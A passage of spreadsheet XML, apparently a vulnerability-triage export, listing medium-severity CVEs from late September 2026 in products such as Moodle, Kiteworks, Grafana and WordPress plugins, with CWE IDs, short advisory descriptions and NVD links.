          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100269</t>
        </is>
      </c>
      <c r="D543" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E543" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F543" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="inlineStr"/>
      <c r="I543" s="5" t="inlineStr"/>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr"/>
      <c r="L543" s="5" t="inlineStr"/>
      <c r="M543" s="5" t="inlineStr"/>
      <c r="N543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O543" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P543" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q543" s="5" t="inlineStr"/>
      <c r="R543" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S543" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 helpdesk project's Authorized Reporters list could be bypassed</t>
        </is>
      </c>
      <c r="T543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100269</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102090</t>
        </is>
      </c>
      <c r="D544" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E544" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F544" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G544" s="5" t="inlineStr"/>
      <c r="H544" s="5" t="inlineStr"/>
      <c r="I544" s="5" t="inlineStr"/>
      <c r="J544" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K544" s="5" t="inlineStr"/>
      <c r="L544" s="5" t="inlineStr"/>
      <c r="M544" s="5" t="inlineStr"/>
      <c r="N544" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O544" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P544" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q544" s="5" t="inlineStr"/>
      <c r="R544" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S544" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.1 is vulnerable to Content Injection. A URL parameter in the PDF viewer was insufficiently validated, allowing an attacker-controlled document to be loaded and displayed under the trust of the legitimate application domain. This could increase the credibility of phishing attempts relying on malicious links embedded in the displayed content.</t>
        </is>
      </c>
      <c r="T544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102090</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102122</t>
        </is>
      </c>
      <c r="D545" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E545" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F545" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G545" s="5" t="inlineStr"/>
      <c r="H545" s="5" t="inlineStr"/>
      <c r="I545" s="5" t="inlineStr"/>
      <c r="J545" s="5" t="inlineStr"/>
      <c r="K545" s="5" t="inlineStr"/>
      <c r="L545" s="5" t="inlineStr"/>
      <c r="M545" s="5" t="inlineStr"/>
      <c r="N545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O545" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P545" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q545" s="5" t="inlineStr"/>
      <c r="R545" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S545" s="5" t="inlineStr">
        <is>
          <t>Kiteworks did not correctly enforce which roles a shared folder's manager was permitted to assign. In a default configuration, an authenticated user holding the Manager role on a folder could grant the Owner role to themselves or to other members of that folder.</t>
        </is>
      </c>
      <c r="T545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102122</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102577</t>
        </is>
      </c>
      <c r="D546" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E546" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F546" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="inlineStr"/>
      <c r="I546" s="5" t="inlineStr"/>
      <c r="J546" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K546" s="5" t="inlineStr"/>
      <c r="L546" s="5" t="inlineStr"/>
      <c r="M546" s="5" t="inlineStr"/>
      <c r="N546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O546" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P546" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q546" s="5" t="inlineStr"/>
      <c r="R546" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S546" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. Incorrect handling of IPv4-mapped IPv6 addresses within the URL downloader's host-blocking logic allows an authenticated remote user to bypass blocked-host restrictions. By supplying a crafted URL, an attacker can induce the server to make requests to restricted destinations, leading to Server-Side Request Forgery (SSRF).</t>
        </is>
      </c>
      <c r="T546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102577</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102579</t>
        </is>
      </c>
      <c r="D547" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E547" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F547" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G547" s="5" t="inlineStr"/>
      <c r="H547" s="5" t="inlineStr"/>
      <c r="I547" s="5" t="inlineStr"/>
      <c r="J547" s="5" t="inlineStr"/>
      <c r="K547" s="5" t="inlineStr"/>
      <c r="L547" s="5" t="inlineStr"/>
      <c r="M547" s="5" t="inlineStr"/>
      <c r="N547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O547" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P547" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q547" s="5" t="inlineStr"/>
      <c r="R547" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="S547" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. An incorrect capability check in the grade web service allows an authenticated student to access profile information of other students enrolled in the same course that they should not have permission to view. This issue leads to unauthorized information disclosure.</t>
        </is>
      </c>
      <c r="T547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102579</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102584</t>
        </is>
      </c>
      <c r="D548" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E548" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F548" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G548" s="5" t="inlineStr"/>
      <c r="H548" s="5" t="inlineStr"/>
      <c r="I548" s="5" t="inlineStr"/>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr"/>
      <c r="L548" s="5" t="inlineStr"/>
      <c r="M548" s="5" t="inlineStr"/>
      <c r="N548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O548" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P548" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q548" s="5" t="inlineStr"/>
      <c r="R548" s="5" t="inlineStr">
        <is>
          <t>CWE-425</t>
        </is>
      </c>
      <c r="S548" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. Due to a missing capability check, a low-privileged authenticated user can trigger the recalculation of grade penalties without holding the required permissions. This issue allows unauthorized users to modify grade penalty records, potentially altering student assessment scores.</t>
        </is>
      </c>
      <c r="T548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102584</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102585</t>
        </is>
      </c>
      <c r="D549" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E549" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F549" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="inlineStr"/>
      <c r="I549" s="5" t="inlineStr"/>
      <c r="J549" s="5" t="inlineStr"/>
      <c r="K549" s="5" t="inlineStr"/>
      <c r="L549" s="5" t="inlineStr"/>
      <c r="M549" s="5" t="inlineStr"/>
      <c r="N549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O549" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P549" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q549" s="5" t="inlineStr"/>
      <c r="R549" s="5" t="inlineStr">
        <is>
          <t>CWE-842</t>
        </is>
      </c>
      <c r="S549" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. When enrolling a user into a course while assigning them to a group, the application does not verify whether the selected group actually belongs to that course. An authenticated user with teacher privileges could exploit this flaw to add users to groups within courses they do not have authorization to access.</t>
        </is>
      </c>
      <c r="T549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102585</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102586</t>
        </is>
      </c>
      <c r="D550" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E550" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F550" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="inlineStr"/>
      <c r="I550" s="5" t="inlineStr"/>
      <c r="J550" s="5" t="inlineStr"/>
      <c r="K550" s="5" t="inlineStr"/>
      <c r="L550" s="5" t="inlineStr"/>
      <c r="M550" s="5" t="inlineStr"/>
      <c r="N550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O550" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P550" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q550" s="5" t="inlineStr"/>
      <c r="R550" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S550" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. Insufficient sanitization of username input on the password reset page allows a remote attacker to conduct a cross-site scripting (XSS) attack. By convincing an unauthenticated user to access a specially crafted password reset link, an attacker could execute arbitrary script in the victim's browser.</t>
        </is>
      </c>
      <c r="T550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102586</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103118</t>
        </is>
      </c>
      <c r="D551" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E551" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G551" s="5" t="inlineStr"/>
      <c r="H551" s="5" t="inlineStr"/>
      <c r="I551" s="5" t="inlineStr"/>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr"/>
      <c r="L551" s="5" t="inlineStr"/>
      <c r="M551" s="5" t="inlineStr"/>
      <c r="N551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O551" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P551" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q551" s="5" t="inlineStr"/>
      <c r="R551" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-674</t>
        </is>
      </c>
      <c r="S551" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in GraphicsMagick up to 1.3.47. Affected by this vulnerability is the function ExtractPostscript of the file coders/wpg.c of the component WPG File Handler. Performing a manipulation results in uncontrolled recursion. The attack may be initiated remotely. The patch is named 627b5b1b2fc2. It is suggested to install a patch to address this issue. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.</t>
        </is>
      </c>
      <c r="T551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103118</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103387</t>
        </is>
      </c>
      <c r="D552" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E552" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G552" s="5" t="inlineStr"/>
      <c r="H552" s="5" t="inlineStr"/>
      <c r="I552" s="5" t="inlineStr"/>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr"/>
      <c r="L552" s="5" t="inlineStr"/>
      <c r="M552" s="5" t="inlineStr"/>
      <c r="N552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O552" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P552" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q552" s="5" t="inlineStr"/>
      <c r="R552" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S552" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in garycourt uri-js up to 4.4.1. This affects the function URI.parse of the file src/schemes/mailto.ts of the component Mailto Header Handler. This manipulation of the argument to causes uncaught exception. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103387</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103542</t>
        </is>
      </c>
      <c r="D553" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E553" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="inlineStr"/>
      <c r="I553" s="5" t="inlineStr"/>
      <c r="J553" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K553" s="5" t="inlineStr"/>
      <c r="L553" s="5" t="inlineStr"/>
      <c r="M553" s="5" t="inlineStr"/>
      <c r="N553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O553" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P553" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q553" s="5" t="inlineStr"/>
      <c r="R553" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S553" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in formtools.org Form Tools up to 3.1.1. Impacted is the function smart_fill of the file /global/code/actions.php of the component AJAX Endpoint. This manipulation of the argument url causes server-side request forgery. The attack can be initiated remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103542</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13719</t>
        </is>
      </c>
      <c r="D554" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E554" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F554" s="5" t="inlineStr">
        <is>
          <t>security@grafana.com</t>
        </is>
      </c>
      <c r="G554" s="5" t="inlineStr"/>
      <c r="H554" s="5" t="inlineStr"/>
      <c r="I554" s="5" t="inlineStr"/>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr"/>
      <c r="L554" s="5" t="inlineStr"/>
      <c r="M554" s="5" t="inlineStr"/>
      <c r="N554" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O554" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P554" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q554" s="5" t="inlineStr"/>
      <c r="R554" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-863</t>
        </is>
      </c>
      <c r="S554" s="5" t="inlineStr">
        <is>
          <t>An authenticated user can list alert rules stored in folders they are not allowed to read through the alert rules API list endpoint. When the set of folders the user may read was empty, the folder restriction was dropped and every alert rule in the organization was returned. From Grafana 13.1.0, any user can trigger this with a folder filter. The exposed data is rule configuration; data source credentials are not exposed.</t>
        </is>
      </c>
      <c r="T554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13719</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88999</t>
        </is>
      </c>
      <c r="D555" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E555" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G555" s="5" t="inlineStr"/>
      <c r="H555" s="5" t="inlineStr"/>
      <c r="I555" s="5" t="inlineStr"/>
      <c r="J555" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K555" s="5" t="inlineStr"/>
      <c r="L555" s="5" t="inlineStr"/>
      <c r="M555" s="5" t="inlineStr"/>
      <c r="N555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O555" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P555" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q555" s="5" t="inlineStr"/>
      <c r="R555" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S555" s="5" t="inlineStr">
        <is>
          <t>The Redux Framework plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.5.14 This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary media library attachments, including administrator-owned files, from the affected site. This is exploitable by Subscribers when a Custom Fonts field is registered on the user profile page via Redux_Users::set_profile(), as doing so causes the required redux_custom_fonts nonce to be rendered into the Subscriber's wp-admin/profile.php page.</t>
        </is>
      </c>
      <c r="T555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88999</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94672</t>
        </is>
      </c>
      <c r="D556" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E556" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F556" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G556" s="5" t="inlineStr"/>
      <c r="H556" s="5" t="inlineStr"/>
      <c r="I556" s="5" t="inlineStr"/>
      <c r="J556" s="5" t="inlineStr"/>
      <c r="K556" s="5" t="inlineStr"/>
      <c r="L556" s="5" t="inlineStr"/>
      <c r="M556" s="5" t="inlineStr"/>
      <c r="N556" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O556" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P556" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q556" s="5" t="inlineStr"/>
      <c r="R556" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S556" s="5" t="inlineStr">
        <is>
          <t>Contributor Insecure Direct Object References (IDOR) in Safe SVG &lt;= 2.5.0 versions.</t>
        </is>
      </c>
      <c r="T556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94672</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97074</t>
        </is>
      </c>
      <c r="D557" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E557" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F557" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="inlineStr"/>
      <c r="I557" s="5" t="inlineStr"/>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr"/>
      <c r="L557" s="5" t="inlineStr"/>
      <c r="M557" s="5" t="inlineStr"/>
      <c r="N557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O557" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P557" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q557" s="5" t="inlineStr"/>
      <c r="R557" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S557" s="5" t="inlineStr">
        <is>
          <t>Subscriber Insecure Direct Object References (IDOR) in Newsletters, Email Marketing, SMS and Popups by Omnisend &lt;= 1.9.0 versions.</t>
        </is>
      </c>
      <c r="T557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97074</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97079</t>
        </is>
      </c>
      <c r="D558" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E558" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F558" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G558" s="5" t="inlineStr"/>
      <c r="H558" s="5" t="inlineStr"/>
      <c r="I558" s="5" t="inlineStr"/>
      <c r="J558" s="5" t="inlineStr"/>
      <c r="K558" s="5" t="inlineStr"/>
      <c r="L558" s="5" t="inlineStr"/>
      <c r="M558" s="5" t="inlineStr"/>
      <c r="N558" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O558" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P558" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q558" s="5" t="inlineStr"/>
      <c r="R558" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S558" s="5" t="inlineStr">
        <is>
          <t>Subscriber Insecure Direct Object References (IDOR) in Webba Booking &lt;= 6.5.0 versions.</t>
        </is>
      </c>
      <c r="T558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97079</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97267</t>
        </is>
      </c>
      <c r="D559" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E559" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F559" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G559" s="5" t="inlineStr"/>
      <c r="H559" s="5" t="inlineStr"/>
      <c r="I559" s="5" t="inlineStr"/>
      <c r="J559" s="5" t="inlineStr"/>
      <c r="K559" s="5" t="inlineStr"/>
      <c r="L559" s="5" t="inlineStr"/>
      <c r="M559" s="5" t="inlineStr"/>
